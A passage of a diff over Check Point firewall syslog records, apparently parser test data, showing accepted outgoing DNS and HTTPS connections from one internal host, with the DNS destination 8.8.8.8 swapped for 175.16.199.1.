origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56994"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44583"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56994"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44583"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"172.217.168.194"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38596"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.54.95"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38534"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"88.221.161.146"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"43130"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53609"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46679"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50264"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0xa,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49124"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53609"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46679"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50264"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0xa,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49124"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0xb,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.16"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53132"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0xc,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38423"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0xd,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34714"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0xc,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38423"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0xd,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34714"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0xe,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"15"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"136.243.95.176"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54402"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0xf,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"16"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"23.11.238.95"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52104"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0x10,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"17"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37726"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:31:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db78,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503096"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40113"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:31:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db78,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503096"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45936"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:31:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db78,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503096"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39569"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:31:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db78,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503096"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47638"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db77,0x10,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"17"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503095"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37726"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db78,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503096"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40113"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db78,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503096"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45936"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:31:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db78,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503096"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 